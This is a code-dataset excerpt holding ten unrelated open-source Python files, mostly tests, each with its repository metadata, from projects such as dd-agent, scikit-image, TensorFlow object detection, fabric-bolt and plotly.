text
stringlengths 4
1.02M
| meta
dict |
---|---|
from agithub.base import VERSION, STR_VERSION
__all__ = ["VERSION", "STR_VERSION"]
| {
"content_hash": "6f82c3b076ecf253718e4d5c88c281db",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 45,
"avg_line_length": 28,
"alnum_prop": 0.6904761904761905,
"repo_name": "mozilla/agithub",
"id": "e47e18b0e11b798d0e3284c2b66cee8bbd301b56",
"size": "172",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "agithub/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "34949"
}
],
"symlink_target": ""
} |
import re
from django.core.exceptions import ObjectDoesNotExist
from django.template import Library, Node, Variable
from django.utils.safestring import mark_safe
from django.core.urlresolvers import reverse
from wakawaka.models import WikiPage
from wakawaka.urls import WIKI_SLUG
register = Library()
WIKI_WORDS_REGEX = re.compile(r'\b%s\b' % WIKI_SLUG)
def replace_wikiwords(value, group=None):
def replace_wikiword(m):
slug = m.group(1)
try:
page = WikiPage.objects.get(slug=slug)
kwargs = {
'slug': slug,
}
if group:
url = group.content_bridge.reverse('wakawaka_page', group, kwargs=kwargs)
else:
url = reverse('wakawaka_page', kwargs=kwargs)
return r'<a href="%s">%s</a>' % (url, slug)
except ObjectDoesNotExist:
kwargs = {
'slug': slug,
}
if group:
url = group.content_bridge.reverse('wakawaka_edit', group, kwargs=kwargs)
else:
url = reverse('wakawaka_edit', kwargs=kwargs)
return r'<a class="doesnotexist" href="%s">%s</a>' % (url, slug)
return mark_safe(WIKI_WORDS_REGEX.sub(replace_wikiword, value))
@register.filter
def wikify(value):
"""Makes WikiWords"""
return replace_wikiwords(value)
class WikifyContentNode(Node):
def __init__(self, content_expr, group_var):
self.content_expr = content_expr
self.group_var = Variable(group_var)
def render(self, context):
content = self.content_expr.resolve(context)
group = self.group_var.resolve(context)
return replace_wikiwords(content, group)
@register.tag
def wikify_content(parser, token):
bits = token.split_contents()
try:
group_var = bits[2]
except IndexError:
group_var = None
return WikifyContentNode(parser.compile_filter(bits[1]), group_var)
| {
"content_hash": "45fc80eadf45bc69e85d13a63dbb4e88",
"timestamp": "",
"source": "github",
"line_count": 62,
"max_line_length": 89,
"avg_line_length": 31.741935483870968,
"alnum_prop": 0.6158536585365854,
"repo_name": "pythonchelle/pycon",
"id": "8685cb1056643b376cd93c39eb7fd8c391575ebc",
"size": "2099",
"binary": false,
"copies": "3",
"ref": "refs/heads/2012",
"path": "pycon_project/apps/wakawaka/templatetags/wakawaka_tags.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
from contextlib import contextmanager
from random import random, randrange
import os
import subprocess
import sys
import time
import unittest
import urllib as url
# 3p
from mock import patch
from nose.plugins.attrib import attr
# project
# needed because of the subprocess calls
sys.path.append(os.getcwd())
from ddagent import Application
from util import Watchdog
class WatchdogKill(Exception):
"""
The watchdog attempted to kill the process.
"""
pass
@attr('unix')
@attr(requires='core_integration')
class TestWatchdog(unittest.TestCase):
"""
Test watchdog in various conditions
"""
JITTER_FACTOR = 2
@contextmanager
def set_time(self, time):
"""
Helper, a context manager to set the current time value.
"""
# Set the current time within `util` module
mock_time = patch("util.time.time")
mock_time.start().return_value = time
# Yield
yield
# Unset the time mock
mock_time.stop()
@patch.object(Watchdog, 'self_destruct', side_effect=WatchdogKill)
def test_watchdog_frenesy_detection(self, mock_restarted):
"""
Watchdog restarts the process on suspicious high activity.
"""
# Limit the restart timeframe for test purpose
Watchdog._RESTART_TIMEFRAME = 1
# Create a watchdog with a low activity tolerancy
process_watchdog = Watchdog(10, max_resets=3)
ping_watchdog = process_watchdog.reset
with self.set_time(1):
# Can be reset 3 times within the watchdog timeframe
for x in xrange(0, 3):
ping_watchdog()
# On the 4th attempt, the watchdog detects a suspicously high activity
self.assertRaises(WatchdogKill, ping_watchdog)
with self.set_time(3):
# Gets back to normal when the activity timeframe expires.
ping_watchdog()
def test_watchdog(self):
"""
Verify that watchdog kills ourselves even when spinning
Verify that watchdog kills ourselves when hanging
"""
start = time.time()
try:
subprocess.check_call(["python", __file__, "busy"], stderr=subprocess.STDOUT)
raise Exception("Should have died with an error")
except subprocess.CalledProcessError:
duration = int(time.time() - start)
self.assertTrue(duration < self.JITTER_FACTOR * 5)
# Start pseudo web server
subprocess.Popen(["nc", "-l", "31834"])
start = time.time()
try:
subprocess.check_call(["python", __file__, "net"])
raise Exception("Should have died with an error")
except subprocess.CalledProcessError:
duration = int(time.time() - start)
self.assertTrue(duration < self.JITTER_FACTOR * 5)
# Normal loop, should run 5 times
start = time.time()
try:
subprocess.check_call(["python", __file__, "normal"])
duration = int(time.time() - start)
self.assertTrue(duration < self.JITTER_FACTOR * 5)
except subprocess.CalledProcessError:
self.fail("Watchdog killed normal process after %s seconds" % int(time.time() - start))
# Fast tornado, not killed
start = time.time()
p = subprocess.Popen(["python", __file__, "fast"])
p.wait()
duration = int(time.time() - start)
# should die as soon as flush_trs has been called
self.assertTrue(duration < self.JITTER_FACTOR * 10)
# Slow tornado, killed by the Watchdog
start = time.time()
p = subprocess.Popen(["python", __file__, "slow"])
p.wait()
duration = int(time.time() - start)
self.assertTrue(duration < self.JITTER_FACTOR * 4)
class MockTxManager(object):
def flush(self):
"Pretend to flush for a long time"
time.sleep(5)
sys.exit(0)
class MemoryHogTxManager(object):
def __init__(self, watchdog):
self._watchdog = watchdog
def flush(self):
rand_data = []
while True:
rand_data.append('%030x' % randrange(256**15))
self._watchdog.reset()
class PseudoAgent(object):
"""Same logic as the agent, simplified"""
AGENT_CONFIG = {
"bind_host": "localhost",
'endpoints': {
'https://app.datadoghq.com': ['api_key']
},
'forwarder_timeout': 5
}
def busy_run(self):
w = Watchdog(5)
w.reset()
while True:
random()
def hanging_net(self):
w = Watchdog(5)
w.reset()
x = url.urlopen("http://localhost:31834")
print "ERROR Net call returned", x
return True
def normal_run(self):
w = Watchdog(2)
w.reset()
for i in range(5):
time.sleep(1)
w.reset()
def slow_tornado(self):
a = Application(12345, self.AGENT_CONFIG)
a._watchdog = Watchdog(4)
a._tr_manager = MockTxManager()
a.run()
def fast_tornado(self):
a = Application(12345, self.AGENT_CONFIG)
a._watchdog = Watchdog(6)
a._tr_manager = MockTxManager()
a.run()
if __name__ == "__main__":
if sys.argv[1] == "busy":
a = PseudoAgent()
a.busy_run()
elif sys.argv[1] == "net":
a = PseudoAgent()
a.hanging_net()
elif sys.argv[1] == "normal":
a = PseudoAgent()
a.normal_run()
elif sys.argv[1] == "slow":
a = PseudoAgent()
a.slow_tornado()
elif sys.argv[1] == "fast":
a = PseudoAgent()
a.fast_tornado()
elif sys.argv[1] == "test":
t = TestWatchdog()
t.runTest()
elif sys.argv[1] == "memory":
a = PseudoAgent()
a.use_lots_of_memory()
| {
"content_hash": "c26a03e99ee3cd933bbe5b84052a358f",
"timestamp": "",
"source": "github",
"line_count": 205,
"max_line_length": 99,
"avg_line_length": 28.58048780487805,
"alnum_prop": 0.5777436422597713,
"repo_name": "cberry777/dd-agent",
"id": "c42a0ab46dbf1f388233eae0ffa1a54daee7888a",
"size": "5868",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "tests/core/test_watchdog.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ApacheConf",
"bytes": "2753"
},
{
"name": "Go",
"bytes": "2389"
},
{
"name": "HTML",
"bytes": "8536"
},
{
"name": "Nginx",
"bytes": "3908"
},
{
"name": "PowerShell",
"bytes": "2665"
},
{
"name": "Python",
"bytes": "2510442"
},
{
"name": "Ruby",
"bytes": "87522"
},
{
"name": "Shell",
"bytes": "77317"
},
{
"name": "XSLT",
"bytes": "2222"
}
],
"symlink_target": ""
} |
r"""Tests for detection_inference.py."""
import os
import StringIO
import numpy as np
from PIL import Image
import tensorflow as tf
from object_detection.core import standard_fields
from object_detection.inference import detection_inference
from object_detection.utils import dataset_util
def get_mock_tfrecord_path():
return os.path.join(tf.test.get_temp_dir(), 'mock.tfrec')
def create_mock_tfrecord():
pil_image = Image.fromarray(np.array([[[123, 0, 0]]], dtype=np.uint8), 'RGB')
image_output_stream = StringIO.StringIO()
pil_image.save(image_output_stream, format='png')
encoded_image = image_output_stream.getvalue()
feature_map = {
'test_field':
dataset_util.float_list_feature([1, 2, 3, 4]),
standard_fields.TfExampleFields.image_encoded:
dataset_util.bytes_feature(encoded_image),
}
tf_example = tf.train.Example(features=tf.train.Features(feature=feature_map))
with tf.python_io.TFRecordWriter(get_mock_tfrecord_path()) as writer:
writer.write(tf_example.SerializeToString())
def get_mock_graph_path():
return os.path.join(tf.test.get_temp_dir(), 'mock_graph.pb')
def create_mock_graph():
g = tf.Graph()
with g.as_default():
in_image_tensor = tf.placeholder(
tf.uint8, shape=[1, None, None, 3], name='image_tensor')
tf.constant([2.0], name='num_detections')
tf.constant(
[[[0, 0.8, 0.7, 1], [0.1, 0.2, 0.8, 0.9], [0.2, 0.3, 0.4, 0.5]]],
name='detection_boxes')
tf.constant([[0.1, 0.2, 0.3]], name='detection_scores')
tf.identity(
tf.constant([[1.0, 2.0, 3.0]]) *
tf.reduce_sum(tf.cast(in_image_tensor, dtype=tf.float32)),
name='detection_classes')
graph_def = g.as_graph_def()
with tf.gfile.Open(get_mock_graph_path(), 'w') as fl:
fl.write(graph_def.SerializeToString())
class InferDetectionsTests(tf.test.TestCase):
def test_simple(self):
create_mock_graph()
create_mock_tfrecord()
serialized_example_tensor, image_tensor = detection_inference.build_input(
[get_mock_tfrecord_path()])
self.assertAllEqual(image_tensor.get_shape().as_list(), [1, None, None, 3])
(detected_boxes_tensor, detected_scores_tensor,
detected_labels_tensor) = detection_inference.build_inference_graph(
image_tensor, get_mock_graph_path())
with self.test_session(use_gpu=False) as sess:
sess.run(tf.global_variables_initializer())
sess.run(tf.local_variables_initializer())
tf.train.start_queue_runners()
tf_example = detection_inference.infer_detections_and_add_to_example(
serialized_example_tensor, detected_boxes_tensor,
detected_scores_tensor, detected_labels_tensor, False)
self.assertProtoEquals(r"""
features {
feature {
key: "image/detection/bbox/ymin"
value { float_list { value: [0.0, 0.1] } } }
feature {
key: "image/detection/bbox/xmin"
value { float_list { value: [0.8, 0.2] } } }
feature {
key: "image/detection/bbox/ymax"
value { float_list { value: [0.7, 0.8] } } }
feature {
key: "image/detection/bbox/xmax"
value { float_list { value: [1.0, 0.9] } } }
feature {
key: "image/detection/label"
value { int64_list { value: [123, 246] } } }
feature {
key: "image/detection/score"
value { float_list { value: [0.1, 0.2] } } }
feature {
key: "image/encoded"
value { bytes_list { value:
"\211PNG\r\n\032\n\000\000\000\rIHDR\000\000\000\001\000\000"
"\000\001\010\002\000\000\000\220wS\336\000\000\000\022IDATx"
"\234b\250f`\000\000\000\000\377\377\003\000\001u\000|gO\242"
"\213\000\000\000\000IEND\256B`\202" } } }
feature {
key: "test_field"
value { float_list { value: [1.0, 2.0, 3.0, 4.0] } } } }
""", tf_example)
def test_discard_image(self):
create_mock_graph()
create_mock_tfrecord()
serialized_example_tensor, image_tensor = detection_inference.build_input(
[get_mock_tfrecord_path()])
(detected_boxes_tensor, detected_scores_tensor,
detected_labels_tensor) = detection_inference.build_inference_graph(
image_tensor, get_mock_graph_path())
with self.test_session(use_gpu=False) as sess:
sess.run(tf.global_variables_initializer())
sess.run(tf.local_variables_initializer())
tf.train.start_queue_runners()
tf_example = detection_inference.infer_detections_and_add_to_example(
serialized_example_tensor, detected_boxes_tensor,
detected_scores_tensor, detected_labels_tensor, True)
self.assertProtoEquals(r"""
features {
feature {
key: "image/detection/bbox/ymin"
value { float_list { value: [0.0, 0.1] } } }
feature {
key: "image/detection/bbox/xmin"
value { float_list { value: [0.8, 0.2] } } }
feature {
key: "image/detection/bbox/ymax"
value { float_list { value: [0.7, 0.8] } } }
feature {
key: "image/detection/bbox/xmax"
value { float_list { value: [1.0, 0.9] } } }
feature {
key: "image/detection/label"
value { int64_list { value: [123, 246] } } }
feature {
key: "image/detection/score"
value { float_list { value: [0.1, 0.2] } } }
feature {
key: "test_field"
value { float_list { value: [1.0, 2.0, 3.0, 4.0] } } } }
""", tf_example)
if __name__ == '__main__':
tf.test.main()
| {
"content_hash": "6bd2ebfba0ccd58c34c08c2cba23ccf7",
"timestamp": "",
"source": "github",
"line_count": 162,
"max_line_length": 80,
"avg_line_length": 35.388888888888886,
"alnum_prop": 0.5951508808651665,
"repo_name": "cshallue/models",
"id": "eabb6b474d672a48139cb4cdeebd388a4d5c4fca",
"size": "6422",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "research/object_detection/inference/detection_inference_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "1523636"
},
{
"name": "Dockerfile",
"bytes": "9821"
},
{
"name": "GLSL",
"bytes": "976"
},
{
"name": "HTML",
"bytes": "147010"
},
{
"name": "JavaScript",
"bytes": "33208"
},
{
"name": "Jupyter Notebook",
"bytes": "2829707"
},
{
"name": "Makefile",
"bytes": "4933"
},
{
"name": "Python",
"bytes": "13149300"
},
{
"name": "Shell",
"bytes": "146035"
}
],
"symlink_target": ""
} |
"""Fichier contenant la fonction route."""
from primaires.scripting.fonction import Fonction
from primaires.scripting.instruction import ErreurExecution
class ClasseFonction(Fonction):
"""Retourne la route entre deux salles, si trouvée."""
@classmethod
def init_types(cls):
cls.ajouter_types(cls.route, "Salle", "Salle")
@staticmethod
def route(origine, destination):
"""Retourne la liste des sorties reliant origine à destination.
Cette fonction utilise le complexe des routes créé. Les
deux salles (origine et destination) doivent donc être
présentes dans deux routes. Il doit de plus exister un
chemin identifié par le système (le système doit savoir
comment relier les deux routes en question). Si la route ne
peut pas être trouvée, pour X raison, une valeur nulle est
retournée et un message d'avertissement est enregistré dans
les logs, pour aider au débuggage. Sinon, retourne la
liste des sorties permettant de se rendre de origine à
destination.
Paramètres à préciser :
* origine : la salle d'origine
* destination : la salle de destination
Exemple d'utilisation :
# Récupère deux salles dans l'univers, si nécessaire
origine = salle("zone1:mnemonique1")
destination = salle("zone2:mnemonique2")
# Recherche la route entre 'origine' et 'destination'
sorties = route(origine, destination)
si sorties:
# La route a pu être trouvée
# ...
pour chaque direction dans sorties:
dire origine "On va vers ${direction}."
fait
finsi
"""
try:
route = importeur.route.trouver_chemin(origine, destination)
except ValueError as err:
importeur.scripting.logger.warning(str(err))
return None
else:
return route.sorties
| {
"content_hash": "dedc5509ab68a4b10c1692be7d53a93c",
"timestamp": "",
"source": "github",
"line_count": 56,
"max_line_length": 72,
"avg_line_length": 35.67857142857143,
"alnum_prop": 0.6356356356356356,
"repo_name": "vlegoff/tsunami",
"id": "70dda25d2986cfc3c1863df51e15bce3dfa0cc9b",
"size": "3588",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/secondaires/route/fonctions/route.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "7930908"
},
{
"name": "Ruby",
"bytes": "373"
}
],
"symlink_target": ""
} |
"""
This file demonstrates writing tests using the unittest module. These will pass
when you run "manage.py test".
Replace this with more appropriate tests for your application.
"""
from django.core.urlresolvers import reverse
from django.test import TestCase
from django.contrib.auth import get_user_model
from django.core.cache import cache
from model_mommy import mommy
from fabric_bolt.projects import models
from fabric_bolt.web_hooks import models as hook_models
User = get_user_model()
class TestURLS(TestCase):
project_type = None
project = None
stage = None
configuration = None
task = None
deployment = None
def setUp(self):
password = 'mypassword'
self.user = User.objects.create_superuser(email='[email protected]', password=password)
# You'll need to log him in before you can send requests through the client
self.client.login(email=self.user.email, password=password)
self._create_project()
def _create_project(self):
# Bare bones project
project = models.Project()
project.name = 'TEST_PROJECT'
project.description = 'TEST_DESCRIPTION'
project.save()
project_hook = hook_models.Hook()
project_hook.url = 'http://example.com/project/hook/'
project_hook.project = project
project_hook.save()
self.project_hook = project_hook
self.project = project
def test_create_url(self):
c = self.client
result = c.get(reverse('hooks_hook_create'))
self.assertIn(result.status_code, [200, 302])
def test_hook_with_project_url(self):
c = self.client
result = c.get(reverse('hooks_hook_create_with_project', args=(self.project.pk,)))
self.assertIn(result.status_code, [200, 302])
def test_hook_view(self):
c = self.client
result = c.get(reverse('hooks_hook_view', args=(self.project_hook.pk,)))
self.assertIn(result.status_code, [200, 302])
def test_hook_update(self):
c = self.client
result = c.get(reverse('hooks_hook_update', args=(self.project_hook.pk,)))
self.assertIn(result.status_code, [200, 302])
def test_hook_delete(self):
c = self.client
result = c.get(reverse('hooks_hook_delete', args=(self.project_hook.pk,)))
self.assertIn(result.status_code, [200, 302])
def test_hook_reverse(self):
h = hook_models.Hook()
h.url = 'http://www.example.com'
self.assertEqual(reverse('index'), h.get_absolute_url())
def test_hook_reverse_with_project(self):
h = hook_models.Hook()
h.url = 'http://www.example.com'
h.project = self.project
self.assertEqual(reverse('projects_project_view', args=(self.project.pk,)), h.get_absolute_url())
def test_hook_objects_manager(self):
hooks = hook_models.Hook.objects.hooks(self.project)
self.assertEqual(self.project_hook, hooks[0])
| {
"content_hash": "6bced4f0dd8f6744a6cac487c960537f",
"timestamp": "",
"source": "github",
"line_count": 99,
"max_line_length": 105,
"avg_line_length": 30.11111111111111,
"alnum_prop": 0.6507883260650789,
"repo_name": "brajput24/fabric-bolt",
"id": "aceef8654be8a9f4046b81b31ddc5876568691af",
"size": "2981",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "fabric_bolt/web_hooks/tests/test_urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "779"
},
{
"name": "HTML",
"bytes": "60042"
},
{
"name": "JavaScript",
"bytes": "102422"
},
{
"name": "Python",
"bytes": "197798"
}
],
"symlink_target": ""
} |
from flask_wtf.form import Form
from wtforms.fields import TextAreaField, PasswordField
from wtforms.fields.html5 import EmailField
from wtforms.widgets.core import TextArea
from wtforms.validators import input_required
class CKEditorWidget(TextArea):
def __call__(self, field, **kwargs):
if kwargs.get('class'):
kwargs['class'] += 'ckeditor'
else:
kwargs.setdefault('class', 'ckeditor')
return super(CKEditorWidget, self).__call__(field, **kwargs)
class CKEditorField(TextAreaField):
widget = CKEditorWidget()
class LoginForm(Form):
email = EmailField(validators=[input_required()])
password = PasswordField(validators=[input_required()])
__all__ = ('LoginForm', 'CKEditorField')
| {
"content_hash": "46bb1d30f91565a7376e43db6cad4905",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 68,
"avg_line_length": 28.96153846153846,
"alnum_prop": 0.6985391766268261,
"repo_name": "ap13p/elearn",
"id": "cc9304a6705d05958e20d31bedfb1c22cae97ec8",
"size": "753",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "apps/forms/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "4903"
},
{
"name": "HTML",
"bytes": "44617"
},
{
"name": "JavaScript",
"bytes": "446"
},
{
"name": "Python",
"bytes": "40188"
},
{
"name": "Shell",
"bytes": "63"
}
],
"symlink_target": ""
} |
class MonitorTimer:
def __init__(self, monitor, metric):
pass
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
pass
class Monitor:
def __init__(self, settings):
pass
def put(self, metric, value, units):
pass
def count(self, metric):
pass
def time(self, metric):
return MonitorTimer(self, metric) | {
"content_hash": "7ab7f8ce7c7bba25c4717462e14c00a3",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 44,
"avg_line_length": 14.375,
"alnum_prop": 0.6550724637681159,
"repo_name": "oskgeek/liftpass",
"id": "e9cde4e504b709f48df6612ce0d82ccb659be1da",
"size": "347",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "core/monitoring/base.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "14383"
},
{
"name": "CoffeeScript",
"bytes": "15139"
},
{
"name": "HTML",
"bytes": "85150"
},
{
"name": "JavaScript",
"bytes": "103804"
},
{
"name": "Python",
"bytes": "118678"
}
],
"symlink_target": ""
} |
import _plotly_utils.basevalidators
class FamilyValidator(_plotly_utils.basevalidators.StringValidator):
def __init__(self, plotly_name="family", parent_name="pie.title.font", **kwargs):
super(FamilyValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "plot"),
no_blank=kwargs.pop("no_blank", True),
role=kwargs.pop("role", "style"),
strict=kwargs.pop("strict", True),
**kwargs
)
| {
"content_hash": "19ec38a66640a9e2f80e5a285408d1ed",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 85,
"avg_line_length": 39.666666666666664,
"alnum_prop": 0.5882352941176471,
"repo_name": "plotly/python-api",
"id": "8b658bcaf83a662a724ec51588f44eb568d39656",
"size": "595",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/validators/pie/title/font/_family.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "6870"
},
{
"name": "Makefile",
"bytes": "1708"
},
{
"name": "Python",
"bytes": "823245"
},
{
"name": "Shell",
"bytes": "3238"
}
],
"symlink_target": ""
} |
import numpy as np
from numpy.testing import (assert_equal, assert_almost_equal,
assert_raises)
from skimage.transform._geometric import _stackcopy
from skimage.transform._geometric import GeometricTransform
from skimage.transform import (estimate_transform, matrix_transform,
EuclideanTransform, SimilarityTransform,
AffineTransform, ProjectiveTransform,
PolynomialTransform, PiecewiseAffineTransform)
from skimage._shared._warnings import expected_warnings
SRC = np.array([
[-12.3705, -10.5075],
[-10.7865, 15.4305],
[8.6985, 10.8675],
[11.4975, -9.5715],
[7.8435, 7.4835],
[-5.3325, 6.5025],
[6.7905, -6.3765],
[-6.1695, -0.8235],
])
DST = np.array([
[0, 0],
[0, 5800],
[4900, 5800],
[4900, 0],
[4479, 4580],
[1176, 3660],
[3754, 790],
[1024, 1931],
])
def test_stackcopy():
layers = 4
x = np.empty((3, 3, layers))
y = np.eye(3, 3)
_stackcopy(x, y)
for i in range(layers):
assert_almost_equal(x[..., i], y)
def test_estimate_transform():
for tform in ('euclidean', 'similarity', 'affine', 'projective',
'polynomial'):
estimate_transform(tform, SRC[:2, :], DST[:2, :])
assert_raises(ValueError, estimate_transform, 'foobar',
SRC[:2, :], DST[:2, :])
def test_matrix_transform():
tform = AffineTransform(scale=(0.1, 0.5), rotation=2)
assert_equal(tform(SRC), matrix_transform(SRC, tform.params))
def test_euclidean_estimation():
# exact solution
tform = estimate_transform('euclidean', SRC[:2, :], SRC[:2, :] + 10)
assert_almost_equal(tform(SRC[:2, :]), SRC[:2, :] + 10)
assert_almost_equal(tform.params[0, 0], tform.params[1, 1])
assert_almost_equal(tform.params[0, 1], - tform.params[1, 0])
# over-determined
tform2 = estimate_transform('euclidean', SRC, DST)
assert_almost_equal(tform2.inverse(tform2(SRC)), SRC)
assert_almost_equal(tform2.params[0, 0], tform2.params[1, 1])
assert_almost_equal(tform2.params[0, 1], - tform2.params[1, 0])
# via estimate method
tform3 = EuclideanTransform()
tform3.estimate(SRC, DST)
assert_almost_equal(tform3.params, tform2.params)
def test_euclidean_init():
# init with implicit parameters
rotation = 1
translation = (1, 1)
tform = EuclideanTransform(rotation=rotation, translation=translation)
assert_almost_equal(tform.rotation, rotation)
assert_almost_equal(tform.translation, translation)
# init with transformation matrix
tform2 = EuclideanTransform(tform.params)
assert_almost_equal(tform2.rotation, rotation)
assert_almost_equal(tform2.translation, translation)
# test special case for scale if rotation=0
rotation = 0
translation = (1, 1)
tform = EuclideanTransform(rotation=rotation, translation=translation)
assert_almost_equal(tform.rotation, rotation)
assert_almost_equal(tform.translation, translation)
# test special case for scale if rotation=90deg
rotation = np.pi / 2
translation = (1, 1)
tform = EuclideanTransform(rotation=rotation, translation=translation)
assert_almost_equal(tform.rotation, rotation)
assert_almost_equal(tform.translation, translation)
def test_similarity_estimation():
# exact solution
tform = estimate_transform('similarity', SRC[:2, :], DST[:2, :])
assert_almost_equal(tform(SRC[:2, :]), DST[:2, :])
assert_almost_equal(tform.params[0, 0], tform.params[1, 1])
assert_almost_equal(tform.params[0, 1], - tform.params[1, 0])
# over-determined
tform2 = estimate_transform('similarity', SRC, DST)
assert_almost_equal(tform2.inverse(tform2(SRC)), SRC)
assert_almost_equal(tform2.params[0, 0], tform2.params[1, 1])
assert_almost_equal(tform2.params[0, 1], - tform2.params[1, 0])
# via estimate method
tform3 = SimilarityTransform()
tform3.estimate(SRC, DST)
assert_almost_equal(tform3.params, tform2.params)
def test_similarity_init():
# init with implicit parameters
scale = 0.1
rotation = 1
translation = (1, 1)
tform = SimilarityTransform(scale=scale, rotation=rotation,
translation=translation)
assert_almost_equal(tform.scale, scale)
assert_almost_equal(tform.rotation, rotation)
assert_almost_equal(tform.translation, translation)
# init with transformation matrix
tform2 = SimilarityTransform(tform.params)
assert_almost_equal(tform2.scale, scale)
assert_almost_equal(tform2.rotation, rotation)
assert_almost_equal(tform2.translation, translation)
# test special case for scale if rotation=0
scale = 0.1
rotation = 0
translation = (1, 1)
tform = SimilarityTransform(scale=scale, rotation=rotation,
translation=translation)
assert_almost_equal(tform.scale, scale)
assert_almost_equal(tform.rotation, rotation)
assert_almost_equal(tform.translation, translation)
# test special case for scale if rotation=90deg
scale = 0.1
rotation = np.pi / 2
translation = (1, 1)
tform = SimilarityTransform(scale=scale, rotation=rotation,
translation=translation)
assert_almost_equal(tform.scale, scale)
assert_almost_equal(tform.rotation, rotation)
assert_almost_equal(tform.translation, translation)
def test_affine_estimation():
# exact solution
tform = estimate_transform('affine', SRC[:3, :], DST[:3, :])
assert_almost_equal(tform(SRC[:3, :]), DST[:3, :])
# over-determined
tform2 = estimate_transform('affine', SRC, DST)
assert_almost_equal(tform2.inverse(tform2(SRC)), SRC)
# via estimate method
tform3 = AffineTransform()
tform3.estimate(SRC, DST)
assert_almost_equal(tform3.params, tform2.params)
def test_affine_init():
# init with implicit parameters
scale = (0.1, 0.13)
rotation = 1
shear = 0.1
translation = (1, 1)
tform = AffineTransform(scale=scale, rotation=rotation, shear=shear,
translation=translation)
assert_almost_equal(tform.scale, scale)
assert_almost_equal(tform.rotation, rotation)
assert_almost_equal(tform.shear, shear)
assert_almost_equal(tform.translation, translation)
# init with transformation matrix
tform2 = AffineTransform(tform.params)
assert_almost_equal(tform2.scale, scale)
assert_almost_equal(tform2.rotation, rotation)
assert_almost_equal(tform2.shear, shear)
assert_almost_equal(tform2.translation, translation)
def test_piecewise_affine():
tform = PiecewiseAffineTransform()
tform.estimate(SRC, DST)
# make sure each single affine transform is exactly estimated
assert_almost_equal(tform(SRC), DST)
assert_almost_equal(tform.inverse(DST), SRC)
def test_projective_estimation():
# exact solution
tform = estimate_transform('projective', SRC[:4, :], DST[:4, :])
assert_almost_equal(tform(SRC[:4, :]), DST[:4, :])
# over-determined
tform2 = estimate_transform('projective', SRC, DST)
assert_almost_equal(tform2.inverse(tform2(SRC)), SRC)
# via estimate method
tform3 = ProjectiveTransform()
tform3.estimate(SRC, DST)
assert_almost_equal(tform3.params, tform2.params)
def test_projective_init():
tform = estimate_transform('projective', SRC, DST)
# init with transformation matrix
tform2 = ProjectiveTransform(tform.params)
assert_almost_equal(tform2.params, tform.params)
def test_polynomial_estimation():
# over-determined
tform = estimate_transform('polynomial', SRC, DST, order=10)
assert_almost_equal(tform(SRC), DST, 6)
# via estimate method
tform2 = PolynomialTransform()
tform2.estimate(SRC, DST, order=10)
assert_almost_equal(tform2.params, tform.params)
def test_polynomial_init():
tform = estimate_transform('polynomial', SRC, DST, order=10)
# init with transformation parameters
tform2 = PolynomialTransform(tform.params)
assert_almost_equal(tform2.params, tform.params)
def test_polynomial_default_order():
tform = estimate_transform('polynomial', SRC, DST)
tform2 = estimate_transform('polynomial', SRC, DST, order=2)
assert_almost_equal(tform2.params, tform.params)
def test_polynomial_inverse():
assert_raises(Exception, PolynomialTransform().inverse, 0)
def test_union():
tform1 = SimilarityTransform(scale=0.1, rotation=0.3)
tform2 = SimilarityTransform(scale=0.1, rotation=0.9)
tform3 = SimilarityTransform(scale=0.1 ** 2, rotation=0.3 + 0.9)
tform = tform1 + tform2
assert_almost_equal(tform.params, tform3.params)
tform1 = AffineTransform(scale=(0.1, 0.1), rotation=0.3)
tform2 = SimilarityTransform(scale=0.1, rotation=0.9)
tform3 = SimilarityTransform(scale=0.1 ** 2, rotation=0.3 + 0.9)
tform = tform1 + tform2
assert_almost_equal(tform.params, tform3.params)
assert tform.__class__ == ProjectiveTransform
tform = AffineTransform(scale=(0.1, 0.1), rotation=0.3)
assert_almost_equal((tform + tform.inverse).params, np.eye(3))
def test_union_differing_types():
tform1 = SimilarityTransform()
tform2 = PolynomialTransform()
assert_raises(TypeError, tform1.__add__, tform2)
def test_geometric_tform():
tform = GeometricTransform()
assert_raises(NotImplementedError, tform, 0)
assert_raises(NotImplementedError, tform.inverse, 0)
assert_raises(NotImplementedError, tform.__add__, 0)
def test_invalid_input():
assert_raises(ValueError, ProjectiveTransform, np.zeros((2, 3)))
assert_raises(ValueError, AffineTransform, np.zeros((2, 3)))
assert_raises(ValueError, SimilarityTransform, np.zeros((2, 3)))
assert_raises(ValueError, EuclideanTransform, np.zeros((2, 3)))
assert_raises(ValueError, AffineTransform,
matrix=np.zeros((2, 3)), scale=1)
assert_raises(ValueError, SimilarityTransform,
matrix=np.zeros((2, 3)), scale=1)
assert_raises(ValueError, EuclideanTransform,
matrix=np.zeros((2, 3)), translation=(0, 0))
assert_raises(ValueError, PolynomialTransform, np.zeros((3, 3)))
def test_degenerate():
src = dst = np.zeros((10, 2))
tform = SimilarityTransform()
tform.estimate(src, dst)
assert np.all(np.isnan(tform.params))
